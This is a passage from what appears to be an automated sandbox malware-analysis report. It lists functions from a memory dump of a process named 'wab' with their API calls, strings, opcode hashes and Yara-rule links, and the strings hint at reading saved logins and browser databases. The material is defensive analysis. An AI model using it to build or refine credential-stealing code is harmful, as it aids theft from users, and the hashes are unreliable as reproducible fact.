                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3015003838-0
                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                              • _mbscpy.MSVCRT ref: 00407E7E
                                                                                              • _mbscpy.MSVCRT ref: 00407ED7
                                                                                              • _mbscpy.MSVCRT ref: 00407EEE
                                                                                              • _mbscpy.MSVCRT ref: 00407F01
                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 59245283-0
                                                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                              • String ID:
                                                                                              • API String ID: 3467550082-0
                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                              • String ID: 3A
                                                                                              • API String ID: 3300951397-293699754
                                                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • memcpy.MSVCRT ref: 0040D24C
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                              • String ID: strings
                                                                                              • API String ID: 3166385802-3030018805
                                                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                              • String ID: AE$.cfg$General$EA
                                                                                              • API String ID: 776488737-1622828088
                                                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 1028950076-4169760276
                                                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: -journal$-wal
                                                                                              • API String ID: 438689982-2894717839
                                                                                              • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                              • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3975816621-0
                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                              • API String ID: 1214746602-2708368587
                                                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                              • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                              • String ID:
                                                                                              • API String ID: 2047574939-0
                                                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                              • memcpy.MSVCRT ref: 0044A8BF
                                                                                              • memcpy.MSVCRT ref: 0044A90C
                                                                                              • memcpy.MSVCRT ref: 0044A988
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                              • memcpy.MSVCRT ref: 0044A9D8
                                                                                              • memcpy.MSVCRT ref: 0044AA19
                                                                                              • memcpy.MSVCRT ref: 0044AA4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                              • API String ID: 3510742995-2446657581
                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfwcscat
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 384018552-4153097237
                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2029023288-3849865405
                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                              • memset.MSVCRT ref: 00405455
                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                              • memset.MSVCRT ref: 00405483
                                                                                              • memcpy.MSVCRT ref: 00405498
                                                                                              • memcpy.MSVCRT ref: 004054AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                              • String ID: 6$\
                                                                                              • API String ID: 404372293-1284684873
                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
